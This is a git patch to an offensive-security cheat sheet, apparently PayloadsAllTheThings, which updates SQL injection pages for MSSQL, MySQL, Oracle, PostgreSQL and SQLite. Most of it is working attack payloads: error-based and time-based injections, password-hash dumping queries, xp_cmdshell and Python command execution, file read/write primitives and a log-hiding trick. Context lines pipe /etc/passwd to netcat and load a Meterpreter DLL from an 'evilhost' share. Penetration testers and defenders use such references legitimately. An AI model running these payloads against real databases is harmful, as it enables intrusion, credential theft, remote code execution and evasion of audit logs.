From 3c5bab03381c4790e8eec99be8fa91a8fc64e49f Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 16 Nov 2024 18:49:01 +0100 Subject: [PATCH] SQL - File Manipulation and Error Based Injection --- SQL Injection/MSSQL Injection.md | 135 ++++++++++++++++---------- SQL Injection/MySQL Injection.md | 24 ++++- SQL Injection/OracleSQL Injection.md | 127 +++++++++++++++--------- SQL Injection/PostgreSQL Injection.md | 132 +++++++++++++------------ SQL Injection/SQLite Injection.md | 39 ++++++-- 5 files changed, 284 insertions(+), 173 deletions(-) diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index f1f4adb..92c3920 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -7,18 +7,19 @@ * [MSSQL Default Databases](#mssql-default-databases) * [MSSQL Comments](#mssql-comments) -* [MSSQL Database Credentials](#mssql-database-credentials) * [MSSQL Enumeration](#mssql-enumeration) * [MSSQL List Databases](#mssql-list-databases) - * [MSSQL List Columns](#mssql-list-columns) * [MSSQL List Tables](#mssql-list-tables) + * [MSSQL List Columns](#mssql-list-columns) * [MSSQL Union Based](#mssql-union-based) * [MSSQL Error Based](#mssql-error-based) * [MSSQL Blind Based](#mssql-blind-based) * [MSSQL Blind With Substring Equivalent](#mssql-blind-with-substring-equivalent) * [MSSQL Time Based](#mssql-time-based) * [MSSQL Stacked Query](#mssql-stacked-query) -* [MSSQL Read File](#mssql-read-file) +* [MSSQL File Manipulation](#mssql-file-manipulation) + * [MSSQL Read File](#mssql-read-file) + * [MSSQL Write File](#mssql-write-file) * [MSSQL Command Execution](#mssql-command-execution) * [XP_CMDSHELL](#xp_cmdshell) * [Python Script](#python-script) @@ -29,6 +30,8 @@ * [MSSQL Privileges](#mssql-privileges) * [MSSQL List Permissions](#mssql-list-permissions) * [MSSQL Make User DBA](#mssql-make-user-dba) +* [MSSQL Database Credentials](#mssql-database-credentials) +* [MSSQL OPSEC](#mssql-opsec) * [References](#references) @@ -49,47 +52,34 @@ | Type | Description | |----------------------------|-----------------------------------| | `/* MSSQL Comment */` | C-style comment | -| `-- -` | SQL comment | +| `--` | SQL comment | | `;%00` | Null byte | -## MSSQL Database Credentials - -* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578` - ```sql - SELECT name, password FROM master..sysxlogins - SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins - -- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer - ``` -* **MSSQL 2005**: Hashcat mode 132: `0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe` - ```sql - SELECT name, password_hash FROM master.sys.sql_logins - SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins - ``` - - ## MSSQL Enumeration -| Description | SQL Query | -| ------------- | ----------------------------------------- | -| DBMS version | `SELECT @@version` | -| Database name | `SELECT DB_NAME()` | -| Hostname | `SELECT HOST_NAME()` | -| Hostname | `SELECT @@hostname` | -| Hostname | `SELECT @@SERVERNAME` | -| Hostname | `SELECT SERVERPROPERTY('productversion')` | -| Hostname | `SELECT SERVERPROPERTY('productlevel')` | -| Hostname | `SELECT SERVERPROPERTY('edition')` | -| User | `SELECT CURRENT_USER` | -| User | `SELECT user_name();` | -| User | `SELECT system_user;` | -| User | `SELECT user;` | +| Description | SQL Query | +| --------------- | ----------------------------------------- | +| DBMS version | `SELECT @@version` | +| Database name | `SELECT DB_NAME()` | +| Database schema | `SELECT SCHEMA_NAME()` | +| Hostname | `SELECT HOST_NAME()` | +| Hostname | `SELECT @@hostname` | +| Hostname | `SELECT @@SERVERNAME` | +| Hostname | `SELECT SERVERPROPERTY('productversion')` | +| Hostname | `SELECT SERVERPROPERTY('productlevel')` | +| Hostname | `SELECT SERVERPROPERTY('edition')` | +| User | `SELECT CURRENT_USER` | +| User | `SELECT user_name();` | +| User | `SELECT system_user;` | +| User | `SELECT user;` | ### MSSQL List Databases ```sql SELECT name FROM master..sysdatabases; +SELECT name FROM master.sys.databases; -- for N = 0, 1, 2, … SELECT DB_NAME(N); @@ -99,6 +89,25 @@ SELECT DB_NAME(N); SELECT STRING_AGG(name, ', ') FROM master..sysdatabases; ``` +### MSSQL List Tables + +```sql +-- use xtype = 'V' for views +SELECT name FROM master..sysobjects WHERE xtype = 'U'; +SELECT name FROM ..sysobjects WHERE xtype='U' +SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U'; + +-- list column names and types for master..sometable +SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; + +SELECT table_catalog, table_name FROM information_schema.columns +SELECT table_name FROM information_schema.tables WHERE table_catalog='' + +-- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+) +SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; +``` + + ### MSSQL List Columns ```sql @@ -109,23 +118,8 @@ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ' SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; SELECT table_catalog, column_name FROM information_schema.columns -``` -### MSSQL List Tables - -```sql --- use xtype = 'V' for views -SELECT name FROM master..sysobjects WHERE xtype = 'U'; - -SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U'; - --- list column names and types for master..sometable -SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; - -SELECT table_catalog, table_name FROM information_schema.columns - --- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+) -SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; +SELECT COL_NAME(OBJECT_ID('.'), ) ``` @@ -166,6 +160,13 @@ SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; ## MSSQL Error Based +| Name | Payload | +| ------------ | --------------- | +| CONVERT | `AND 1337=CONVERT(INT,(SELECT '~'+(SELECT @@version)+'~')) -- -` | +| IN | `AND 1337 IN (SELECT ('~'+(SELECT @@version)+'~')) -- -` | +| EQUAL | `AND 1337=CONCAT('~',(SELECT @@version),'~') -- -` | +| CAST | `CAST((SELECT @@version) AS INT)` | + * For integer inputs ```sql @@ -249,15 +250,31 @@ IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0'; ``` -## MSSQL Read File +## MSSQL File Manipulation + +### MSSQL Read File **Permissions**: The `BULK` option requires the `ADMINISTER BULK OPERATIONS` or the `ADMINISTER DATABASE BULK OPERATIONS` permission. + +```sql +OPENROWSET(BULK 'C:\path\to\file', SINGLE_CLOB) +``` + +Example: + ```sql -1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null ``` +### MSSQL Write File + +```sql +execute spWriteStringToFile 'contents', 'C:\path\to\', 'file' +``` + + ## MSSQL Command Execution ### XP_CMDSHELL @@ -268,7 +285,7 @@ EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'; EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'; ``` -If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005) +If you need to reactivate `xp_cmdshell` (disabled by default in SQL Server 2005) ```sql EXEC sp_configure 'show advanced options',1; @@ -282,7 +299,6 @@ RECONFIGURE; > Executed by a different user than the one using `xp_cmdshell` to execute commands ```powershell -# Print the user being used (and execute commands) EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())' EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))' EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())' @@ -401,6 +417,21 @@ EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; ``` +## MSSQL Database Credentials + +* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578` + ```sql + SELECT name, password FROM master..sysxlogins + SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins + -- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer + ``` +* **MSSQL 2005**: Hashcat mode 132: `0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe` + ```sql + SELECT name, password_hash FROM master.sys.sql_logins + SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins + ``` + + ## MSSQL OPSEC Use `SP_PASSWORD` in a query to hide from the logs like : `' AND 1=1--sp_password` diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 3a9e542..90441f0 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -69,7 +69,7 @@ MySQL comments are annotations in SQL code that are ignored by the MySQL server | `/* MYSQL Comment */` | C-style comment | | `/*! MYSQL Special SQL */` | Special SQL | | `/*!32302 10*/` | Comment for MYSQL version 3.23.02 | -| `-- -` | SQL comment | +| `--` | SQL comment | | `;%00` | Nullbyte | | \` | Backtick | @@ -229,6 +229,17 @@ MariaDB [dummydb]> SELECT AUTHOR_ID,TITLE FROM POSTS WHERE AUTHOR_ID=-1 UNION SE ## MYSQL Error Based +| Name | Payload | +| ------------ | --------------- | +| GTID_SUBSET | `AND GTID_SUBSET(CONCAT('~',(SELECT version()),'~'),1337) -- -` | +| JSON_KEYS | `AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('~',(SELECT version()),'~')) USING utf8))) -- -` | +| EXTRACTVALUE | `AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT version()),'~')) -- -` | +| UPDATEXML | `AND UPDATEXML(1337,CONCAT('.','~',(SELECT version()),'~'),31337) -- -` | +| EXP | `AND EXP(~(SELECT * FROM (SELECT CONCAT('~',(SELECT version()),'~','x'))x)) -- -` | +| OR | `OR 1 GROUP BY CONCAT('~',(SELECT version()),'~',FLOOR(RAND(0)*2)) HAVING MIN(0) -- -` | +| NAME_CONST | `AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--` | + + ### MYSQL Error Based - Basic Works with `MySQL >= 4.1` @@ -373,6 +384,8 @@ The following SQL codes will delay the output from MySQL. RLIKE SLEEP([SLEEPTIME]) OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) XOR(IF(NOW()=SYSDATE(),SLEEP(5),0))XOR + AND SLEEP(10)=0 + AND (SELECT 1337 FROM (SELECT(SLEEP(10-(IF((1=1),0,10))))) RANDSTR) ``` ### Using SLEEP in a Subselect @@ -662,12 +675,19 @@ mysql> SELECT @@version; | 5.6.31-0ubuntu0.15.10.1 | +-------------------------+ -mysql> mysql> SELECT version(); +mysql> SELECT version(); +-------------------------+ | version() | +-------------------------+ | 5.6.31-0ubuntu0.15.10.1 | +-------------------------+ + +mysql> SELECT @@GLOBAL.VERSION; ++------------------+ +| @@GLOBAL.VERSION | ++------------------+ +| 8.0.27 | ++------------------+ ``` diff --git a/SQL Injection/OracleSQL Injection.md b/SQL Injection/OracleSQL Injection.md index bad7a21..3207511 100644 --- a/SQL Injection/OracleSQL Injection.md +++ b/SQL Injection/OracleSQL Injection.md @@ -7,13 +7,12 @@ * [Oracle SQL Default Databases](#oracle-sql-default-databases) * [Oracle SQL Comments](#oracle-sql-comments) -* [Oracle SQL Version](#oracle-sql-version) -* [Oracle SQL Hostname](#oracle-sql-hostname) -* [Oracle SQL Database Name](#oracle-sql-database-name) +* [Oracle SQL Enumeration](#oracle-sql-enumeration) * [Oracle SQL Database Credentials](#oracle-sql-database-credentials) -* [Oracle SQL List Databases](#oracle-sql-list-databases) -* [Oracle SQL List Columns](#oracle-sql-list-columns) -* [Oracle SQL List Tables](#oracle-sql-list-tables) +* [Oracle SQL Methodology](#oracle-sql-methodology) + * [Oracle SQL List Databases](#oracle-sql-list-databases) + * [Oracle SQL List Tables](#oracle-sql-list-tables) + * [Oracle SQL List Columns](#oracle-sql-list-columns) * [Oracle SQL Error Based](#oracle-sql-error-based) * [Oracle SQL Blind](#oracle-sql-blind) * [Oracle Blind With Substring Equivalent](#oracle-blind-with-substring-equivalent) @@ -22,6 +21,11 @@ * [Oracle SQL Command Execution](#oracle-sql-command-execution) * [Oracle Java Execution](#oracle-java-execution) * [Oracle Java Class](#oracle-java-class) +* [OracleSQL File Manipulation](#OracleSQL-file-manipulation) + * [OracleSQL Read File](#OracleSQL-read-file) + * [OracleSQL Write File](#OracleSQL-write-file) + * [Package os_command](#package-os_command) + * [DBMS_SCHEDULER Jobs](#dbms_scheduler-jobs) * [References](#references) @@ -35,39 +39,30 @@ ## Oracle SQL Comments -| Type | Description | -|----------------------------|-----------------------------------| -| `-- -` | SQL comment | +| Type | Comment | +| ------------------- | ------- | +| Single-Line Comment | `--` | +| Multi-Line Comment | `/**/` | -## Oracle SQL Version +## Oracle SQL Enumeration -```sql -SELECT user FROM dual UNION SELECT * FROM v$version -SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'; -SELECT banner FROM v$version WHERE banner LIKE 'TNS%'; -SELECT version FROM v$instance; -``` - - -## Oracle SQL Hostname - -```sql -SELECT host_name FROM v$instance; (Privileged) -SELECT UTL_INADDR.get_host_name FROM dual; -SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -SELECT UTL_INADDR.get_host_address FROM dual; -``` - - -## Oracle SQL Database Name - -```sql -SELECT global_name FROM global_name; -SELECT name FROM V$DATABASE; -SELECT instance_name FROM V$INSTANCE; -SELECT SYS.DATABASE_NAME FROM DUAL; -``` +| Description | SQL Query | +| ------------- | ------------------------------------------------------------ | +| DBMS version | `SELECT user FROM dual UNION SELECT * FROM v$version` | +| DBMS version | `SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';` | +| DBMS version | `SELECT banner FROM v$version WHERE banner LIKE 'TNS%';` | +| DBMS version | `SELECT BANNER FROM gv$version WHERE ROWNUM = 1;` | +| DBMS version | `SELECT version FROM v$instance;` | +| Hostname | `SELECT UTL_INADDR.get_host_name FROM dual;` | +| Hostname | `SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;` | +| Hostname | `SELECT UTL_INADDR.get_host_address FROM dual;` | +| Hostname | `SELECT host_name FROM v$instance;` | +| Database name | `SELECT global_name FROM global_name;` | +| Database name | `SELECT name FROM V$DATABASE;` | +| Database name | `SELECT instance_name FROM V$INSTANCE;` | +| Database name | `SELECT SYS.DATABASE_NAME FROM DUAL;` | +| Database name | `SELECT sys_context('USERENV', 'CURRENT_SCHEMA') FROM dual;` | ## Oracle SQL Database Credentials @@ -79,27 +74,29 @@ SELECT SYS.DATABASE_NAME FROM DUAL; | `SELECT name, spare4 from sys.user$;` | Privileged, <= 11g | -## Oracle SQL List Databases +## Oracle SQL Methodology + +### Oracle SQL List Databases ```sql SELECT DISTINCT owner FROM all_tables; +SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES) ``` - -## Oracle SQL List Columns - -```sql -SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'; -SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo'; -``` - - -## Oracle SQL List Tables +### Oracle SQL List Tables ```sql SELECT table_name FROM all_tables; SELECT owner, table_name FROM all_tables; SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; +SELECT OWNER,TABLE_NAME FROM SYS.ALL_TABLES WHERE OWNER='' +``` + +### Oracle SQL List Columns + +```sql +SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'; +SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='' AND OWNER='' ``` @@ -115,6 +112,8 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; | SQL Error | `SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1))` | | XDBURITYPE getblob | `XDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')).getblob()` | | XDBURITYPE getclob | `XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob()` | +| XMLType | `AND 1337=(SELECT UPPER(XMLType(CHR(60)\|\|CHR(58)\|\|'~'\|\|(REPLACE(REPLACE(REPLACE(REPLACE((SELECT banner FROM v$version),' ','_'),'$','(DOLLAR)'),'@','(AT)'),'#','(HASH)'))\|\|'~'\|\|CHR(62))) FROM DUAL) -- -` | +| DBMS_UTILITY | `AND 1337=DBMS_UTILITY.SQLID_TO_SQLHASH('~'\|\|(SELECT banner FROM v$version)\|\|'~') -- -` | When the injection point is inside a string use : `'||PAYLOAD--` @@ -141,6 +140,7 @@ When the injection point is inside a string use : `'||PAYLOAD--` ```sql AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) +AND 1337=(CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('RANDSTR',10) ELSE 1337 END) ``` @@ -209,7 +209,38 @@ SELECT EXTRACTVALUE(xmltype('') cmd from dual +``` + +### DBMS_SCHEDULER Jobs + +```sql +DBMS_SCHEDULER.CREATE_JOB (job_name => 'exec', job_type => 'EXECUTABLE', job_action => '', enabled => TRUE) +``` + + +## OracleSQL File Manipulation + +:warning: Only in a stacked query. + +### OracleSQL Read File + +```sql +utl_file.get_line(utl_file.fopen('/path/to/','file','R'), ) +``` + +### OracleSQL Write File + +```sql +utl_file.put_line(utl_file.fopen('/path/to/','file','R'), ) +``` + ## References diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index 5e21ab2..f79b474 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -6,12 +6,8 @@ ## Summary * [PostgreSQL Comments](#postgresql-comments) -* [PostgreSQL Version](#postgresql-version) -* [PostgreSQL Current User](#postgresql-current-user) -* [PostgreSQL Privileges](#postgresql-privileges) - * [PostgreSQL List Privileges](#postgresql-list-privileges) - * [PostgreSQL Superuser Role](#postgresql-superuser-role) * [PostgreSQL Enumeration](#postgresql-enumeration) +* [PostgreSQL Methodology](#postgresql-methodology) * [PostgreSQL Error Based](#postgresql-error-based) * [PostgreSQL XML Helpers](#postgresql-xml-helpers) * [PostgreSQL Blind](#postgresql-blind) @@ -27,72 +23,65 @@ * [Using libc.so.6](#using-libcso6) * [PostgreSQL WAF Bypass](#postgresql-waf-bypass) * [Alternative to Quotes](#alternative-to-quotes) +* [PostgreSQL Privileges](#postgresql-privileges) + * [PostgreSQL List Privileges](#postgresql-list-privileges) + * [PostgreSQL Superuser Role](#postgresql-superuser-role) * [References](#references) ## PostgreSQL Comments -| Type | Comment | -| ---- | ------- | -| Single-Line Comment | `--` | -| Multi-Line Comment | `/**/` | +| Type | Comment | +| ------------------- | ------- | +| Single-Line Comment | `--` | +| Multi-Line Comment | `/**/` | -## PostgreSQL Version - -```sql -SELECT version() -``` - -## PostgreSQL Current User - -```sql -SELECT user; -SELECT current_user; -SELECT session_user; -SELECT usename FROM pg_user; -SELECT getpgusername(); -``` - - -## PostgreSQL Privileges - -### PostgreSQL List Privileges - -Retrieve all table-level privileges for the current user, excluding tables in system schemas like `pg_catalog` and `information_schema`. - -```sql -SELECT * FROM information_schema.role_table_grants WHERE grantee = current_user AND table_schema NOT IN ('pg_catalog', 'information_schema'); -``` - -### PostgreSQL Superuser Role - -```sql -SHOW is_superuser; -SELECT current_setting('is_superuser'); -SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER; -``` - ## PostgreSQL Enumeration -| SQL Query | Description | -| --------------------------------------- | -------------- | -| `SELECT current_database()` | Database Name | -| `SELECT datname FROM pg_database` | List Databases | -| `SELECT table_name FROM information_schema.tables` | List Tables | -| `SELECT column_name FROM information_schema.columns WHERE table_name='data_table'` | List Columns | -| `SELECT usename FROM pg_user` | List PostgreSQL Users | -| `SELECT usename, passwd FROM pg_shadow` | List Password Hashes | -| `SELECT usename FROM pg_user WHERE usesuper IS TRUE` | List Database Administrator Accounts | +| Description | SQL Query | +| ---------------------- | --------------------------------------- | +| DBMS version | `SELECT version()` | +| Database Name | `SELECT CURRENT_DATABASE()` | +| Database Schema | `SELECT CURRENT_SCHEMA()` | +| List PostgreSQL Users | `SELECT usename FROM pg_user` | +| List Password Hashes | `SELECT usename, passwd FROM pg_shadow` | +| List DB Administrators | `SELECT usename FROM pg_user WHERE usesuper IS TRUE` | +| Current User | `SELECT user;` | +| Current User | `SELECT current_user;` | +| Current User | `SELECT session_user;` | +| Current User | `SELECT usename FROM pg_user;` | +| Current User | `SELECT getpgusername();` | + + +## PostgreSQL Methodology + +| Description | SQL Query | +| ---------------------- | -------------------------------------------- | +| List Schemas | `SELECT DISTINCT(schemaname) FROM pg_tables` | +| List Databases | `SELECT datname FROM pg_database` | +| List Tables | `SELECT table_name FROM information_schema.tables` | +| List Tables | `SELECT table_name FROM information_schema.tables WHERE table_schema=''` | +| List Tables | `SELECT tablename FROM pg_tables WHERE schemaname = ''` | +| List Columns | `SELECT column_name FROM information_schema.columns WHERE table_name='data_table'` | ## PostgreSQL Error Based +| Name | Payload | +| ------------ | --------------- | +| CAST | `AND 1337=CAST('~'\|\|(SELECT version())::text\|\|'~' AS NUMERIC) -- -` | +| CAST | `AND (CAST('~'\|\|(SELECT version())::text\|\|'~' AS NUMERIC)) -- -` | +| CAST | `AND CAST((SELECT version()) AS INT)=1337 -- -` | +| CAST | `AND (SELECT version())::int=1 -- -` | + + + ```sql -,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC) -,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- -,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- -,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC) +CAST(chr(126)||VERSION()||chr(126) AS NUMERIC) +CAST(chr(126)||(SELECT table_name FROM information_schema.tables LIMIT 1 offset data_offset)||chr(126) AS NUMERIC)-- +CAST(chr(126)||(SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset)||chr(126) AS NUMERIC)-- +CAST(chr(126)||(SELECT data_column FROM data_table LIMIT 1 offset data_offset)||chr(126) AS NUMERIC) ``` ```sql @@ -105,14 +94,14 @@ SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER; ### PostgreSQL XML Helpers ```sql -select query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row +SELECT query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row ``` The `query_to_xml` above returns all the results of the specified query as a single result. Chain this with the [PostgreSQL Error Based](#postgresql-error-based) technique to exfiltrate data without having to worry about `LIMIT`ing your query to one result. ```sql -select database_to_xml(true,true,''); -- dump the current database to XML -select database_to_xmlschema(true,true,''); -- dump the current db to an XML schema +SELECT database_to_xml(true,true,''); -- dump the current database to XML +SELECT database_to_xmlschema(true,true,''); -- dump the current db to an XML schema ``` Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition. @@ -166,6 +155,7 @@ select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end ``` ```sql +AND 'RANDSTR'||PG_SLEEP(10)='RANDSTR' AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ``` @@ -276,9 +266,9 @@ SELECT system('cat /etc/passwd | nc '); ``` -### PostgreSQL WAF Bypass +## PostgreSQL WAF Bypass -#### Alternative to Quotes +### Alternative to Quotes | Payload | Technique | | ------------------ | --------- | @@ -286,6 +276,24 @@ SELECT system('cat /etc/passwd | nc '); | `SELECT $TAG$This` | Dollar-sign ( >= version 8 PostgreSQL) | +## PostgreSQL Privileges + +### PostgreSQL List Privileges + +Retrieve all table-level privileges for the current user, excluding tables in system schemas like `pg_catalog` and `information_schema`. + +```sql +SELECT * FROM information_schema.role_table_grants WHERE grantee = current_user AND table_schema NOT IN ('pg_catalog', 'information_schema'); +``` + +### PostgreSQL Superuser Role + +```sql +SHOW is_superuser; +SELECT current_setting('is_superuser'); +SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER; +``` + ## References - [A Penetration Tester's Guide to PostgreSQL - David Hayter - July 22, 2017](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9) diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md index d4b102c..c6a1c80 100644 --- a/SQL Injection/SQLite Injection.md +++ b/SQL Injection/SQLite Injection.md @@ -6,7 +6,7 @@ ## Summary * [SQLite Comments](#sqlite-comments) -* [SQLite Version](#sqlite-version) +* [SQLite Enumeration](#sqlite-enumeration) * [SQLite String](#sqlite-string) * [SQLite String Methodology](#sqlite-string-methodology) * [SQLite Blind](#sqlite-blind) @@ -17,22 +17,26 @@ * [SQlite Remote Code Execution](#sqlite-remote-code-execution) * [Attach Database](#attach-database) * [Load_extension](#load_extension) +* [SQLite File Manipulation](#SQLite-file-manipulation) + * [SQLite Read File](#SQLite-read-file) + * [SQLite Write File](#SQLite-write-file) * [References](#references) ## SQLite Comments -| Type | Description | -|----------------------------|-----------------------------------| -| `/* SQLite Comment */` | C-style comment | -| `--` | SQL comment | +| Description | Comment | +| ------------------- | ------- | +| Single-Line Comment | `--` | +| Multi-Line Comment | `/**/` | -## SQLite Version +## SQLite Enumeration + +| Description | SQL Query | +| ------------- | ----------------------------------------- | +| DBMS version | `select sqlite_version();` | -```sql -select sqlite_version(); -``` ## SQLite String @@ -42,9 +46,12 @@ select sqlite_version(); | ----------------------- | ----------------------------------------- | | Extract Database Structure | `SELECT sql FROM sqlite_schema` | | Extract Database Structure (sqlite_version > 3.33.0) | `SELECT sql FROM sqlite_master` | +| Extract Table Name | `SELECT tbl_name FROM sqlite_master WHERE type='table'` | | Extract Table Name | `SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'` | | Extract Column Name | `SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'` | | Extract Column Name | `SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');` | +| Extract Column Name | `SELECT MAX(sql) FROM sqlite_master WHERE tbl_name=''` | +| Extract Column Name | `SELECT name FROM PRAGMA_TABLE_INFO('')` | ## SQLite Blind @@ -78,6 +85,7 @@ AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END ```sql AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) +AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) ``` @@ -100,6 +108,19 @@ UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain'); ``` +## SQLite File Manipulation + +### SQLite Read File + +SQLite does not support file I/O operations by default. + + +### SQLite Write File + +```sql +SELECT writefile('/path/to/file', column_name) FROM table_name +``` + ## References